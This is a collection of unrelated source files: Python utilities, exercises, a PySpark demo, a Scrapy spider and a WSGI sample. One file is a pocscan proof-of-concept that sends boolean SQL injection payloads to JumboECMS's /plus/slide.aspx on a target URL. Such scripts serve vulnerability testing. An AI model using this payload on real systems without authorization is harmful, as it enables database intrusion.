SeattleTestbed/attic
|
0e33211ddf39efdbcf5573d4fc7fa5201aa7310d
|
f618a962ce2fd3c4838564e8c62c10924f5df45f
|
refs/heads/master
| 2021-06-10T23:10:47.792847
| 2017-05-15T12:05:43
| 2017-05-15T12:05:43
| 20,154,061
| 0
| 1
| null | 2014-10-16T17:21:06
| 2014-05-25T12:34:00
|
Python
|
UTF-8
|
Python
| false
| false
| 6,493
|
repy
|
"""
Author: Justin Cappos
Start date: October 9th, 2009
Purpose: A simple library that serializes and deserializes built-in repy types.
This includes strings, integers, floats, booleans, None, complex, tuples,
lists, sets, frozensets, and dictionaries.
There are no plans for including objects.
  Note that all items are treated as separate references. This means things
like 'a = []; a.append(a)' will result in an infinite loop. If you have
'b = []; c = (b,b)' then 'c[0] is c[1]' is True. After deserialization
'c[0] is c[1]' is False.
I can add support or detection of this if desired.
"""
# The basic idea is simple. Say the type (a character) followed by the
# type specific data. This is adequate for simple types
# that do not contain other types. Types that contain other types have
# a length indicator and then the underlying items listed sequentially.
# For a dict, the serialized keys list is followed by the serialized values list.
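#
# A hedged illustration (not in the original file), worked out from the code
# below:
#   serializedata([1, 'a'])         ->  'L2:I12:Sa0:'
#   serializedata({'k': 1})         ->  'D7:L2:Sk0:L2:I10:'
#   deserializedata('L2:I12:Sa0:')  ->  [1, 'a']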
def serializedata(data):
"""
<Purpose>
Convert a data item of any type into a string such that we can
deserialize it later.
<Arguments>
    data: the thing to serialize. Can be of essentially any type except
objects.
<Exceptions>
TypeError if the type of 'data' isn't allowed
<Side Effects>
None.
<Returns>
A string suitable for deserialization.
"""
# this is essentially one huge case statement...
# None
if type(data) == type(None):
return 'N'
# Boolean
elif type(data) == type(True):
if data == True:
return 'BT'
else:
return 'BF'
# Integer / Long
elif type(data) is int or type(data) is long:
datastr = str(data)
return 'I'+datastr
# Float
elif type(data) is float:
datastr = str(data)
return 'F'+datastr
# Complex
elif type(data) is complex:
datastr = str(data)
if datastr[0] == '(' and datastr[-1] == ')':
datastr = datastr[1:-1]
return 'C'+datastr
# String
elif type(data) is str:
return 'S'+data
# List or tuple or set or frozenset
elif type(data) is list or type(data) is tuple or type(data) is set or type(data) is frozenset:
# the only impact is the first letter...
if type(data) is list:
mystr = 'L'
elif type(data) is tuple:
mystr = 'T'
elif type(data) is set:
mystr = 's'
elif type(data) is frozenset:
mystr = 'f'
else:
raise Exception("InternalError: not a known type after checking")
for item in data:
thisitem = serializedata(item)
# Append the length of the item, plus ':', plus the item. 1 -> '2:I1'
mystr = mystr + str(len(thisitem))+":"+thisitem
mystr = mystr + '0:'
return mystr
# dict
elif type(data) is dict:
mystr = 'D'
keysstr = serializedata(data.keys())
# Append the length of the list, plus ':', plus the list.
mystr = mystr + str(len(keysstr))+":"+keysstr
# just plop the values on the end.
valuestr = serializedata(data.values())
mystr = mystr + valuestr
return mystr
# Unknown!!!
else:
raise TypeError("Unknown type '"+str(type(data))+"' for data :"+str(data))
def deserializedata(datastr):
"""
<Purpose>
Convert a serialized data string back into its original types.
<Arguments>
    datastr: the string to deserialize.
<Exceptions>
ValueError if the string is corrupted
TypeError if the type of 'data' isn't allowed
<Side Effects>
None.
<Returns>
Items of the original type
"""
if type(datastr) != str:
raise TypeError("Cannot deserialize non-string of type '"+str(type(datastr))+"'")
typeindicator = datastr[0]
restofstring = datastr[1:]
# this is essentially one huge case statement...
# None
if typeindicator == 'N':
if restofstring != '':
raise ValueError("Malformed None string '"+restofstring+"'")
return None
# Boolean
elif typeindicator == 'B':
if restofstring == 'T':
return True
elif restofstring == 'F':
return False
raise ValueError("Malformed Boolean string '"+restofstring+"'")
# Integer / Long
elif typeindicator == 'I':
try:
return int(restofstring)
except ValueError:
raise ValueError("Malformed Integer string '"+restofstring+"'")
# Float
elif typeindicator == 'F':
try:
return float(restofstring)
except ValueError:
raise ValueError("Malformed Float string '"+restofstring+"'")
  # Complex
elif typeindicator == 'C':
try:
return complex(restofstring)
except ValueError:
raise ValueError("Malformed Complex string '"+restofstring+"'")
# String
elif typeindicator == 'S':
return restofstring
# List / Tuple / set / frozenset / dict
elif typeindicator == 'L' or typeindicator == 'T' or typeindicator == 's' or typeindicator == 'f':
# We'll split this and keep adding items to the list. At the end, we'll
# convert it to the right type
thislist = []
data = restofstring
# We'll use '0:' as our 'end separator'
while data != '0:':
lengthstr, restofdata = data.split(':', 1)
length = int(lengthstr)
# get this item, convert to a string, append to the list.
thisitemdata = restofdata[:length]
thisitem = deserializedata(thisitemdata)
thislist.append(thisitem)
# Now toss away the part we parsed.
data = restofdata[length:]
if typeindicator == 'L':
return thislist
elif typeindicator == 'T':
return tuple(thislist)
elif typeindicator == 's':
return set(thislist)
elif typeindicator == 'f':
return frozenset(thislist)
else:
raise Exception("InternalError: not a known type after checking")
elif typeindicator == 'D':
lengthstr, restofdata = restofstring.split(':', 1)
length = int(lengthstr)
# get this item, convert to a string, append to the list.
keysdata = restofdata[:length]
keys = deserializedata(keysdata)
# The rest should be the values list.
values = deserializedata(restofdata[length:])
if type(keys) != list or type(values) != list or len(keys) != len(values):
raise ValueError("Malformed Dict string '"+restofstring+"'")
thisdict = {}
for position in xrange(len(keys)):
thisdict[keys[position]] = values[position]
return thisdict
# Unknown!!!
else:
raise ValueError("Unknown typeindicator '"+str(typeindicator)+"' for data :"+str(restofstring))
|
[
"USER@DOMAIN"
] |
USER@DOMAIN
|
80475aeee17df3cba099d4d162c7d768068d604d
|
6c219c027c7d0ef454bdeac196bd773e8b95d602
|
/cms/jumboecms/jumboecms_slide_id_sqli.py
|
2b692758481ff7bb88275db2b44434dd22f770e3
|
[] |
no_license
|
aStrowxyu/pocscan
|
663f3a3458140e1bce7b4dc3702c6014a4c9ac92
|
08c7e7454c6b7c601bc54c21172c4788312603b1
|
refs/heads/master
| 2020-04-19T10:00:56.569105
| 2019-01-29T09:31:31
| 2019-01-29T09:31:31
| 168,127,418
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,432
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: JumboECMS V1.6.1 SQL injection vulnerability
referer: http://www.wooyun.org/bugs/wooyun-2010-062717
author: Lucifer
description: The id parameter of /plus/slide.aspx is vulnerable to SQL injection.
'''
import sys
import requests
import warnings
from termcolor import cprint
class jumboecms_slide_id_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
trueurl = self.url + "/plus/slide.aspx?id=1%20AnD%201=1"
falseurl = self.url + "/plus/slide.aspx?id=1%20AnD%201=2"
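        # Boolean-based check: the "1=1" page should render normally while the
        # "1=2" page should fail (leaking a "Stack trace"); a difference between
        # the two responses suggests id reaches the SQL query unsanitized.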
try:
req1 = requests.get(trueurl, headers=headers, timeout=10, verify=False)
req2 = requests.get(falseurl, headers=headers, timeout=10, verify=False)
if r"Stack trace" not in req1.text and r"Stack trace" in req2.text:
cprint("[+]存在JumboECMS V1.6.1 注入漏洞...(高危)\tpayload: "+falseurl, "red")
else:
cprint("[-]不存在jumboecms_slide_id_sqli漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = jumboecms_slide_id_sqli_BaseVerify(sys.argv[1])
testVuln.run()
|
[
"wangxinyu@vackbot.com"
] |
wangxinyu@vackbot.com
|
fff42786877735c43c12c0b6b7b613c376845e8c
|
6375b7e4dfe11ced7dcd3fad1a7a2de9a504910d
|
/exc7_more_print.py
|
9a734f30db2a725ccfb434e3859ea93eda66107f
|
[] |
no_license
|
yaowenqiang/lpthw
|
b65e6b8ce576e7caa5cfba5570550e546d1e0549
|
4bbd7ebb4e8c570a39bf9c55df9bd97e4f86e1e5
|
refs/heads/master
| 2020-04-01T10:57:32.959389
| 2019-05-01T09:27:25
| 2019-05-01T09:27:25
| 153,140,026
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
print("Mary had a little lamb.")
print("Its fleece was white as {}.".format("snow"))
print("And everywhere that Mary went.")
print("." * 10)
end1 = "c"
end2 = "h"
end3 = "e"
end4 = "e"
end5 = "s"
end6 = "e"
end7 = "b"
end8 = "u"
end9 = "r"
end10 = "g"
end11 = "e"
end12 = "r"
print(end1 + end2 + end3 + end4 + end5 + end6, end=" ")
print(end7 + end8 + end9 + end10 + end11 + end12)
|
[
"yaowenqiang111@163.com"
] |
yaowenqiang111@163.com
|
c0bca8d865bf372c3ad7e16a347e11b50c5bd363
|
6a7058009587e78b5c758ff783410325ad7c2a4b
|
/leet/trees/serializeDeserialize.py
|
11901325add1a326d48e38679f57ee4d830890e5
|
[
"Apache-2.0"
] |
permissive
|
stacykutyepov/python-cp-cheatsheet
|
8b96b76403c501f5579befd07b3c4a4c69fe914e
|
a00a57e1b36433648d1cace331e15ff276cef189
|
refs/heads/master
| 2023-07-16T13:26:35.130763
| 2021-08-30T11:23:39
| 2021-08-30T11:23:39
| 401,442,535
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,345
|
py
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
rtn = []
def dfs(node):
if node:
rtn.append(str(node.val))
dfs(node.left)
dfs(node.right)
else:
rtn.append('#')
dfs(root)
return ' '.join(rtn)
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
def dfs():
val = next(vals)
if val == '#':
return None
else:
node = TreeNode(int(val))
node.left = dfs()
node.right = dfs()
return node
vals = iter(data.split())
return dfs()
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.deserialize(codec.serialize(root))
# Example preorder token stream (with '#' marking null children):
# ['1', '3', '5', '#', '6', '#', '#', '2', '#', '4', '#', '#']
|
[
"peterrlamar@gmail.com"
] |
peterrlamar@gmail.com
|
ae112f60c472608d64fea6061820870ce341dd5c
|
048df2b4dc5ad153a36afad33831017800b9b9c7
|
/atcoder/arc030/arc030_2.py
|
fb80908cb169ecdb2886d69d72282652698d8452
|
[] |
no_license
|
fluffyowl/past-submissions
|
a73e8f5157c647634668c200cd977f4428c6ac7d
|
24706da1f79e5595b2f9f2583c736135ea055eb7
|
refs/heads/master
| 2022-02-21T06:32:43.156817
| 2019-09-16T00:17:50
| 2019-09-16T00:17:50
| 71,639,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,146
|
py
|
def reduce_graph(root, children, houseki):
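    # Prunes every subtree that holds no jewel (houseki): rec_dfs returns False
    # for a node whose remaining children were all removed and which has no
    # jewel itself, and such children are detached from their parent.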
def rec_dfs(node):
removals = []
for c in children[node]:
if not rec_dfs(c):
removals.append(c)
for i in removals[::-1]:
children[node].remove(i)
if len(children[node]) == 0 and houseki[node] == 0:
return False
else:
return True
rec_dfs(root)
return children
def solve():
n, root = map(int, raw_input().split())
root -= 1
rinsetsu = [[] for i in range(n)]
houseki = map(int, raw_input().split())
for i in range(n-1):
x, y = map(lambda x:int(x)-1, raw_input().split())
rinsetsu[x].append(y)
rinsetsu[y].append(x)
children = [[] for i in range(n)]
stack = [(root, None)]
while len(stack) != 0:
node, parent = stack.pop()
for child in rinsetsu[node]:
if child != parent:
children[node].append(child)
stack.append((child, node))
children = reduce_graph(root, children, houseki)
s = 0
for i in range(n):
s += len(children[i]) * 2
print s
solve()
|
[
"nebukuro09@gmail.com"
] |
nebukuro09@gmail.com
|
71724e17def474442e5c246dd126c278d482fb73
|
74482894c61156c13902044b4d39917df8ed9551
|
/test/test_get_contract_details_by_address_response_item.py
|
924e6c10948054f2f336b69dea39bc685b9e522f
|
[
"MIT"
] |
permissive
|
xan187/Crypto_APIs_2.0_SDK_Python
|
bb8898556ba014cc7a4dd31b10e24bec23b74a19
|
a56c75df54ef037b39be1315ed6e54de35bed55b
|
refs/heads/main
| 2023-06-22T15:45:08.273635
| 2021-07-21T03:41:05
| 2021-07-21T03:41:05
| 387,982,780
| 1
| 0
|
NOASSERTION
| 2021-07-21T03:35:29
| 2021-07-21T03:35:29
| null |
UTF-8
|
Python
| false
| false
| 1,353
|
py
|
"""
CryptoAPIs
Crypto APIs 2.0 is a complex and innovative infrastructure layer that radically simplifies the development of any Blockchain and Crypto related applications. Organized around REST, Crypto APIs 2.0 can assist both novice Bitcoin/Ethereum enthusiasts and crypto experts with the development of their blockchain applications. Crypto APIs 2.0 provides unified endpoints and data, raw data, automatic tokens and coins forwardings, callback functionalities, and much more. # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: developers@cryptoapis.io
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import cryptoapis
from cryptoapis.model.get_contract_details_by_address_response_item import GetContractDetailsByAddressResponseItem
class TestGetContractDetailsByAddressResponseItem(unittest.TestCase):
"""GetContractDetailsByAddressResponseItem unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGetContractDetailsByAddressResponseItem(self):
"""Test GetContractDetailsByAddressResponseItem"""
# FIXME: construct object with mandatory attributes with example values
# model = GetContractDetailsByAddressResponseItem() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"kristiyan.ivanov@menasoftware.com"
] |
kristiyan.ivanov@menasoftware.com
|
3a48961a4b6dd2e091a6c553297caabc8dfe0bf9
|
8501165bbbc6acf017b062c846a3ef7ef8624dc0
|
/dataframes.py
|
5e95c158a85cf9e26deb466f6ef7e8a54bd9025e
|
[] |
no_license
|
olavosamp/spark_tutorial
|
df9edcc3cf82fc2103dd4f889e13eec22f97fbcc
|
c80d0e8259eda0dc443c3af259a3b11241ba63fa
|
refs/heads/master
| 2023-03-29T09:20:08.279790
| 2021-03-26T20:01:40
| 2021-03-26T20:01:40
| 351,897,858
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,266
|
py
|
from pyspark.sql import SparkSession
from pyspark.sql.types import StructType, StructField, StringType, IntegerType
spark = SparkSession.builder.master("local[1]").appName("SparkbyExamples.com").getOrCreate()
data = [
("George", "M", 12),
("Adolf","M", 14),
("Emilia","F", 16),
]
print("\nOriginal RDD")
rdd = spark.sparkContext.parallelize(data)
print(rdd)
print("RDD Count ", rdd.count())
print("\nDataFrame from RDD")
df_rdd = rdd.toDF()
df_rdd.show()
print("\nDataFrame from list")
columns = ["Name", "Sex", "Age"]
df_list = spark.createDataFrame(data=data, schema=columns)
df_list.show()
print(df_list.head())
print("\nDataFrame with Schema")
schema = StructType([
StructField("Name", StringType(), False),
StructField("Sex", StringType(), True),
StructField("Age", IntegerType(), True),
])
df_schema = spark.createDataFrame(data=data, schema=schema)
df_schema.printSchema()
df_schema.show(truncate=False)
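# NOTE: exit() below stops the script here; the CSV and SQL examples that
# follow never run unless this call is removed.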
exit()
print("\nDataFrame from csv")
df_csv = spark.read.csv("test.csv", header=True)
df_csv.printSchema()
df_csv.show()
df_csv.createOrReplaceTempView("PERSON_DATA")
df_sql = spark.sql("SELECT * FROM PERSON_DATA")
df_sql.show()
df_groupby = spark.sql("SELECT Sex, COUNT(*) FROM PERSON_DATA GROUP BY Sex")
df_groupby.show()
|
[
"olavosamp@poli.ufrj.br"
] |
olavosamp@poli.ufrj.br
|
ef0aaacd8fedf13c8a18d46944b7df0927c88d38
|
e905abd9bb7bd7017657d0a0c4d724d16e37044c
|
/.history/article/spiders/ieee_20210206223025.py
|
4220b80e3f61daeddb62f3b9b60b2bc1a791ce13
|
[] |
no_license
|
tabdelbari/articles
|
a8b921841f84fb473f5ed1cdcda743863e6bc246
|
f0e1dfdc9e818e43095933139b6379a232647898
|
refs/heads/main
| 2023-03-05T10:21:35.565767
| 2021-02-10T13:35:14
| 2021-02-10T13:35:14
| 325,654,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,534
|
py
|
import scrapy
import logging
import re
from scrapy_splash import SplashRequest, request
from article.items import ArticleItem
import json
class IeeeSpider(scrapy.Spider):
name = 'ieee'
allowed_domains = ['ieee.org']
lua_script = """
function main(splash, args)
assert(splash:go{
splash.args.url,
headers=splash.args.headers,
http_method=splash.args.http_method,
body=splash.args.body,
})
assert(splash:wait(10))
return splash:html()
end
"""
def __init__(self, topic='', keywords='', **kwargs):
super().__init__(**kwargs)
# self.start_urls = ['https://ieeexplore.ieee.org/search/searchresult.jsp?newsearch=true&queryText=%s' %keywords]
self.post_url = 'https://ieeexplore.ieee.org/rest/search'
self.headers = {
'Origin': 'https://ieeexplore.ieee.org',
'Host': 'ieeexplore.ieee.org',
'Accept-Language': 'fr-MA,fr;q=0.9,en-US;q=0.8,en;q=0.7,ar-MA;q=0.6,ar;q=0.5,fr-FR;q=0.4',
'Accept-Encoding': 'gzip, deflate, br',
'Accept': 'application/json',
'Content-Type': 'application/json'
}
self.topic = topic
self.keywords = keywords
self.totalPages = 0
def start_requests(self):
post_data = '{"queryText": "' + self.topic + \
'", "highlight": true, "returnType": "SEARCH", "matchPubs": true, "rowsPerPage": 100, "returnFacets": ["ALL"]}'
yield SplashRequest(self.post_url, self.init_articles, endpoint='execute',
magic_response=True, meta={'handle_httpstatus_all': True, 'data': 'hello'},
args={'lua_source': self.lua_script, 'http_method': 'POST', 'body': post_data, 'headers': self.headers})
def init_articles(self, response):
# response.meta['data'] -> "hello"
jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
self.totalPages = jr['totalPages']
for i in range(1, (self.totalPages+1)):
post_data = '{"queryText": "' + self.topic + \
'", "highlight": true, "returnType": "SEARCH", "matchPubs": true, "rowsPerPage": 100, "returnFacets": ["ALL"], "pageNumber": '+str(i)+'}'
yield SplashRequest(self.post_url, self.parse_1, endpoint='execute',
magic_response=True, meta={'handle_httpstatus_all': True, 'data': i},
args={'lua_source': self.lua_script, 'http_method': 'POST', 'body': post_data, 'headers': self.headers})
pass
def parse_1(self, response):
logging.info('##################################Processing:' + str(response.meta['data']))
jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
for record in jr['records']:
result = {
'title': record['articleTitle'],
'authors': '|'.join(list(map(lambda author: author['preferredName'], record['authors']))),
'country': '',
'abstract': record['abstract'],
'date_pub': record['publicationDate'],
'journal': record['publicationTitle'],
'topic': self.topic
}
# search for country
yield SplashRequest(self.post_url, self.init_articles, endpoint='execute',
magic_response=True, meta={'handle_httpstatus_all': True, 'data': result},
                                args={'lua_source': self.lua_script, 'http_method': 'GET', 'body': None, 'headers': self.headers})  # None, not null
# find abstract for this article and pass as meta the half of object: record['articleNumber']
pass
def parse(self, response):
jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
for record in jr['records']:
result = {
'title': record['articleTitle'],
'authors': '|'.join(list(map(lambda author: author['preferredName'], record['authors']))),
'country': '',
'abstract': record['abstract'],
'date_pub': record['publicationDate'],
'journal': record['publicationTitle'],
'topic': self.topic,
'latitude': '',
'longitude': ''
}
# search for country
yield request
# find abstract for this article and pass as meta the half of object: record['articleNumber']
pass
|
[
"abdelbari1996@hotmail.com"
] |
abdelbari1996@hotmail.com
|
3cd9bfc221cf246f3a393362774ee3f9883a9923
|
288a00d2ab34cba6c389b8c2444455aee55a8a95
|
/tests/data23/recipe-496895.py
|
705c281fd7ebdc79fa6b70e2cc5c4d5bbf46119c
|
[
"BSD-2-Clause"
] |
permissive
|
JohannesBuchner/pystrict3
|
ffd77b7bbc378bd4d8f21b5c6bd69a0d64a52ddb
|
18b0dd369082422f9bf0f89c72e7acb53a49849c
|
refs/heads/master
| 2023-08-14T06:37:37.954880
| 2023-07-13T11:16:38
| 2023-07-13T11:16:38
| 268,571,175
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,143
|
py
|
import string
def rebase(i, frombase=None, tobase=None, fromalphabet=None, toalphabet=None, resize=1, too_big=40000, debug=False):
''' if frombase is not specified, it is guessed from the type and/or char in i with highest ord.
tobase defaults to [10, 2][frombase == 10].
the alphabets are map(chr, range(256)) if its base is between 62 and 255;
        otherwise, string.digits+string.ascii_letters.
always returns a string which is also valid input.
valid bases are ints in range(-256, 257).
alphabets must be subscriptable, and can only contain str's.
invalid tobases are replied with 'why?'; rebase('why?') == '217648673'.
returned string is zfilled to the next largest multiple of resize
'''
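    # A hedged example (not part of the original recipe), assuming the
    # integer-division fix in the loop below:
    #   rebase(255, tobase=16)     ->  'ff'
    #   rebase('ff', frombase=16)  ->  '255'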
if frombase == None:
if isinstance(i, int):
frombase = 10
elif isinstance(i, str):
a = str(i)
if any([(chr(x) in a) for x in list(range(ord('0'))) + list(range(58, 65)) + list(range(91, 97)) + list(range(123, 256))]):
frombase = max(list(map(ord, a))) + 1
else:
            frombase = max(list(map((string.digits + string.ascii_letters).index, a))) + 1
if tobase == None:
tobase = [10, 2][frombase == 10]
# got bases, ensuring that everything is an int
tobase = int(tobase)
frombase = int(frombase)
abstobase = abs(tobase)
absfrombase = abs(frombase)
if absfrombase in [0, 1]:
i = len(str(i))
elif 2 <= frombase <= 36:
# may be difficult to translate to C
i = int(str(i), frombase)
else:
i = str(i)
n = 0
if fromalphabet == None:
if 62 <= absfrombase <= 256:
fromalphabet = list(map(chr, list(range(256))))
else:
            fromalphabet = string.digits + string.ascii_letters
fromalphabet = fromalphabet[:absfrombase]
for j in range(len(i)):
n += (frombase ** j) * fromalphabet.index(i[-1-j])
i = n
# got ints, converting to tobase
if debug: print('converting %d from base %d to %d' % (i, frombase, tobase))
if abstobase in [0, 1]:
return '0' * ((i > 0) and int(i) or 0)
elif abstobase > 256:
return 'why?'
# if execution gets here, we might want the result to be zfilled to a multiple of resize
r = ''
if tobase == 10:
r = str(i)
else:
if i < 0:
print('negative', end=' ')
i = -i
if toalphabet is None:
if 62 <= abstobase <= 256:
toalphabet = list(map(chr, list(range(abstobase))))
else:
                toalphabet = (string.digits + string.ascii_letters)[:abstobase]
if tobase < 0:
i = -i
j = 0
while i != 0:
r = toalphabet[i % tobase] + r
        i //= tobase  # integer division; '/' would yield a float in Python 3
j += 1
        if j >= too_big: raise RuntimeError("call again; set too_big bigger")
if resize > 1:
if 62 <= abstobase <= 256:
r = toalphabet[0] * (resize - (len(r) % resize)) + r
else:
r = r.zfill(len(r) + resize - (len(r) % resize))
return r
|
[
"johannes.buchner.acad@gmx.com"
] |
johannes.buchner.acad@gmx.com
|
e54a39dbfad7a724eeeaa1ef31bddec82f0bd60a
|
b5ca0a2ce47fdb4306bbdffcb995eb7e6eac1b23
|
/Problem Solving/Algorithms/Strings/Strong Password/Strong_Password.py
|
ffab59cbf509d72ada08350dae73075e23cc95ca
|
[] |
no_license
|
rsoemardja/HackerRank
|
ac257a66c3649534197b223b8ab55011d84fb9e1
|
97d28d648a85a16fbe6a5d6ae72ff6503a063ffc
|
refs/heads/master
| 2022-04-14T22:46:03.412359
| 2020-04-03T07:44:04
| 2020-04-03T07:44:04
| 217,687,370
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 758
|
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the minimumNumber function below.
def minimumNumber(n, password):
# Return the minimum number of characters to make the password strong
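    # e.g. n=3, password='Ab1': only a special character is missing (count=1),
    # but the length shortfall 6-3=3 dominates, so the answer is max(1, 3) = 3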
count = 0
if any(i.isdigit() for i in password)==False:
count+=1
if any(i.islower() for i in password)==False:
count+=1
if any(i.isupper() for i in password)==False:
count+=1
if any(i in '!@#$%^&*()-+' for i in password)==False:
count+=1
return max(count,6-n)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
password = input()
answer = minimumNumber(n, password)
fptr.write(str(answer) + '\n')
fptr.close()
|
[
"rsoemardja@gmail.com"
] |
rsoemardja@gmail.com
|
0250af5de2c470cdfe5b35e79ad11ff9fecf0505
|
b3aa3d77836fa8f05b54d68e7bd6bff19dced90d
|
/Atcoder/166/F.py
|
cebe95a2befd384d575177108224c95f438c7ef8
|
[] |
no_license
|
anoubhav/Codeforces-Atcoder-Codechef-solutions
|
660c5b78723791bc33b1d51977bf11ebe6dfe4c1
|
aeebcae332af64aba49f52261d11aa6996f33b1c
|
refs/heads/master
| 2022-12-08T14:02:49.574928
| 2020-08-29T14:18:30
| 2020-08-29T14:18:30
| 255,004,401
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 878
|
py
|
n, a, b, c = list(map(int, input().split()))
slist = []
d = {'A': a, 'B':b, 'C':c}
soln = []
prev = None
for i in range(n):
s = input()
# corner case
if prev:
if prev[0] in s:
d[prev[0]] += 1
d[prev[1]] -= 1
soln.append(prev[0])
else:
d[prev[1]] += 1
d[prev[0]] -= 1
soln.append(prev[1])
prev = None
# corner case
if d[s[0]] ==1 and d[s[1]] == 1:
prev = s
# greedy
elif d[s[0]] >= d[s[1]]:
d[s[0]] -= 1
d[s[1]] += 1
soln.append(s[1])
elif d[s[0]] < d[s[1]]:
d[s[1]] -= 1
d[s[0]] += 1
soln.append(s[0])
if d['A'] < 0 or d['B'] < 0 or d['C'] < 0:
print('No')
exit()
break
print('Yes')
print('\n'.join(soln))
|
[
"anoubhav.agarwaal@gmail.com"
] |
anoubhav.agarwaal@gmail.com
|
3bc0fa150804ea42ba257f13005f8613c6d86e46
|
d3dc206446cffc919a7b3fb0838ca0ef14043e04
|
/redditbot/worker.py
|
3af98330efac68cb5f8d935bf1d5e72af2b2adfd
|
[] |
no_license
|
gtmanfred/redditbot
|
70ff2e2d1a63a4d272db93301ebb4f21acf16dae
|
05d8f24620c9a3847c7e0c37ae8015e048af312e
|
refs/heads/master
| 2020-04-18T14:56:02.289674
| 2015-10-19T01:22:40
| 2015-10-19T01:22:40
| 42,025,013
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,117
|
py
|
from kombu.connection import BrokerConnection
from kombu.mixins import ConsumerMixin
from blinker import signal
import logging
from redditbot.queues import task_queues
logger = logging.getLogger(__name__)
class Worker(ConsumerMixin):
def __init__(self, connection, config):
self.connection = BrokerConnection(connection)
self.config = config
def get_consumers(self, Consumer, channel):
return [Consumer(queues=task_queues,
accept=['pickle', 'json'],
callbacks=[self.process_task])]
def process_task(self, body, message):
post = body['post']
logger.info('Got task: %s', post.id)
try:
logger.info(
'New Post for %s: %s',
post.subreddit.display_name, str(post)
)
for channel in \
self.config['subreddits'][post.subreddit.display_name]:
signal('send-message').send(channel, message=post)
message.ack()
except Exception as exc:
logger.error('Exception Raised: %r', exc)
|
[
"danielwallace@gtmanfred.com"
] |
danielwallace@gtmanfred.com
|
1287031215a5c2e62234091f3722019c1952123e
|
3bcc247a2bc1e0720f0344c96f17aa50d4bcdf2d
|
/第三阶段笔记/x.py
|
9a4ea86bafae287fe00bb41414f17d9df388718a
|
[] |
no_license
|
qianpeng-shen/Study_notes
|
6f77f21a53266476c3c81c9cf4762b2efbf821fa
|
28fb9a1434899efc2d817ae47e94c31e40723d9c
|
refs/heads/master
| 2021-08-16T19:12:57.926127
| 2021-07-06T03:22:05
| 2021-07-06T03:22:05
| 181,856,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,542
|
py
|
import time
HTML_ROOT_DIR="./static"
PYTHON_DIR="./wsgiPy"
class Application(object):
def __init__(self,urls):
self.urls=urls
def __call__(self,env,set_headers):
        path=env.get('PATH_INFO','/')
        if path.startswith('/static'):
            file_name=path[7:]
            try:
                fd=open(HTML_ROOT_DIR+file_name,'rb')
except IOError:
                status='404 not found'
                headers=[]
                set_headers(status,headers)
                return "<h1>=== Not Found ===</h1>"
else:
file_data=fd.read()
fd.close()
status='200 OK'
headers=[]
set_headers(status,headers)
return file_data.decode('utf-8')
else:
for url,handler in self.urls:
if path==url:
return handler(env,set_headers)
status="404 not found"
headers=[]
set_headers(status,headers)
return "sorry url not found"
def show_time(env,set_headers):
    status="200 OK"
    headers=[]
    set_headers(status,headers)
    return time.ctime()
def say_hello(env,set_headers):
    status="200 OK"
    headers=[]
    set_headers(status,headers)
    return "hello"
def say_bye(env,set_headers):
    status="200 OK"
    headers=[]
    set_headers(status,headers)
    return "bye"
def yang(env,set_headers):
    status="200 OK"
    headers=[]
    set_headers(status,headers)
    return "xiaoyang"
urls=[
('/time',show_time),
('/hello',say_hello),
('/bye',say_bye),
("/xiaoyang",yang)
]
app=Application(urls)
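# A hedged usage note (not in the original notes): a WSGI server calls
# app(environ, start_response) for each request, e.g.
#   from wsgiref.simple_server import make_server
#   make_server('', 8000, app).serve_forever()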
|
[
"shenqianpeng@chengfayun.com"
] |
shenqianpeng@chengfayun.com
|
09dc93bf160fae79ae292d82e8e5f44287276cfe
|
70bee1e4e770398ae7ad9323bd9ea06f279e2796
|
/openapi_client/models/waas_path.py
|
628e708d4edce2b96dbb415798f282ec876d858b
|
[] |
no_license
|
hi-artem/twistlock-py
|
c84b420b1e582b3c4cf3631eb72dac6d659d4746
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
refs/heads/main
| 2023-07-18T07:57:57.705014
| 2021-08-22T04:36:33
| 2021-08-22T04:36:33
| 398,637,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,597
|
py
|
# coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class WaasPath(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
